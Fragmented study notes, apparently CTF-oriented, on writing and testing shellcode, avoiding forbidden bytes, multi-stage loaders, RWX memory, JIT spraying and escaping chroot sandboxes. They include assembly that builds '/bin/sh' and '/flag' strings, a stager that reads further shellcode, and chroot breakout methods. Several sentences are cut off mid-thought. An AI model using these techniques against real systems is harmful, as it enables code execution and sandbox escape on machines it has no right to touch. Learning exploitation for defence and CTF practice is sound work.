hello()
function is called viz. hello(bye1, name);
, it was supposed to take in the pointer to an array as the first argument, and the pointer to the function as the second argument, but the developer messed that up.//Example code
void bye1() { puts("Goodbye!"); }
void bye2() { puts("Farewell!");}
void hello(char *name, void (*bye_func)())
{ printf("Hello %s!\\n", name);
bye_func();}
int main(int argc, char **argv)
{
char name[1024];
gets(name);
srand(time(0));
if (rand() % 2)
hello(bye1, name);
else
hello(name, bye2);
}
;;Data section
.string "HELLO" ;;"HELLO\\0"
.byte 0x48, 0x45, 0x4C, 0x4C, 0x4F ;;"HELLO"
;;Other technique
mov RBX, 0x0068732f6e69622f ;;Moving "/bin/sh" into RBX (little endian)
push RBX
mov RDI, RSP
;;Another technique
;;mov RBX, 0x00000067616C662F ;;/flag in little endian format
mov RBX, 0x67616c66
SHL RBX, 8
mov BL, 0x2F
push RBX
#If we have an OS which runs on the architecture of the ISA we're writing shellcode against, we can use objdump
for i in $(objdump -d binary -M intel |grep "^ " |cut -f2); do echo -n '\\x'$i; done;echo
#Generic technique
gcc -nostdlib -static shellcode.asm -o shellcode-elf
objcopy --dump-section .text=shellcode-raw shellcode-elf
#Position independent
gcc -nostdlib -static-pie shellcode.o -o shellcode-elf
#MIPS
mips-linux-gnu-gcc -nostdlib -static shellcode.asm shellcode-elf
qemu-mips-static ./shellcode #debugging cross platform shellcode, -strace
We can debug our shellcode with strace()
and gdb
//gcc -fno-stack-protector -z execstack shellcode.c -ggdb -o shellcode
// Shellcode testing skeleton
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = "shellcode!";
int (*ret)() = (int (*)())shellcode;
void main(void)
{
printf("Shellcode length: %d\\n", (int)strlen(shellcode));
}
//Shellcode delivery
//Both will do the same thing, but the latter one will not waste too 64-bytes
mov RAX, 1
MOV AL, 1
0x00
(strcpy), \\n
(scanf, gets) etc. The trick is to think of other instructions to do the same job so that these forbidden bytes don’t come up into our shellcode.DATA
segment.;;if the int3 opcode is forbidden, but memory region is writable
inc BYTE PTR [rip]
.byte 0xcb ;;int3
;;Making sure the memory where our shellcode is mapped to, is writable
gcc -Wl,-N --static -nostdlib -o test shellcode
If there’s no way to output data, getting a flag is difficult. In those scenarios, we can use syscalls such as close(1)
, and communicate one of bit information at a time, to get the flag.
Also if the shellcode constraints are too high, we could do multi-staged loading in which the first stager passes the instruction filter and loads the rest of the shellcode, which is actually more complex in nature.
;;multi-staged loading
lea RAX, [RIP]
read(0, rax, 1000) ;;stage 1
;;whatever's beneath the shellcode will get overwritten with unfiltered better shellcode, which we can execute :)
;;And we'll be able to bypass all the restrictions put in place by the target program.
<aside> 👉 RWX pages
</aside>
- mmap(PROT_READ | PROT_WRITE)
- Write the code
- mprotect(PROT_READ | PROT_EXEC)
- Execute the code
- mprotect(PROT_READ | PROT_WRITE)
- Update the code etc
#inside /proc
grep -l rwx */maps | parallel "ls -l {//}/exe"
<aside> 👉 De-protecting memory
</aside>
Memory protection can be messed by the help of the mprotect()
syscall, and we can trick the program into mrprotect(PROT_EXEC)
ing our shellcode, the most common way for which is Return Oriented Programming (ROP)
<aside> 👉 JIT Spraying
</aside>
mprotects()
its pages and as a result, no page being RWX
, even then Shellcode Execution can be achieved, via JIT Sprayingmprotect(PROT_WRITE)
, convert it into bytecode, put it in the memory, then do a mprotect(PROT_EXE)
to make it executable, and our code will end up being in executable memory var evil = "%90%90%90%90%90";
<aside> 👉 History
</aside>
<aside> 👉 The need for Sandboxing
</aside>
<aside> 👉 The rise of Sandboxing
</aside>
The idea behind sandboxing is to run code that we don't trust, in extremely isolated environments with zero permissions, and for an attacker to successfully exploit a user, he/ she will have to first exploit the vulnerable process, and then exploit the sandbox to break
<aside> 👉 Basics
</aside>
chroot()
jail sandboxing technique is a primitive sandboxing technique, which came out firstly in UNIX, and BSD afterwards./
for a process and its children sub-processes viz. chroot("/tmp/jail");
will change the root directory for a process to /tmp/jail
.chroot()
to change the root directory temporarily to /tmp/jail
, /someProgram
would actually mean /tmp/jail/someProgram
.sudo chroot <jailDirectory> <command>
#Won't work because the meaning of / gets changed to /tmp/jail and any access to /bin/bash would actually mean /tmp/jail/bin/bash
sudo chroot /tmp/jail /bin/bash
#What we can do instead is to download a statically compiled binary of busybox, put it into /tmp/jail/ and do
sudo chroot /tmp/jail /busybox sh
<aside> 👉 Security pitfalls
</aside>
chroot
, but forget to change the directory to /
using the chdir("/");
syscall, we would end up outside the sandboxchroot()
utility doesn’t close up any previously opened resources, which can be leveraged by syscalls such as openat()
and execvat()
, which are similar to the original syscalls, but instead they take File Descriptor as an input, and the relative path from there, this can be leveraged to break out of the sandbox, because there is no syscall filtering in chroot
chroot()
instance at once, if we chroot()
again, it can be used to overwrite the one previously used.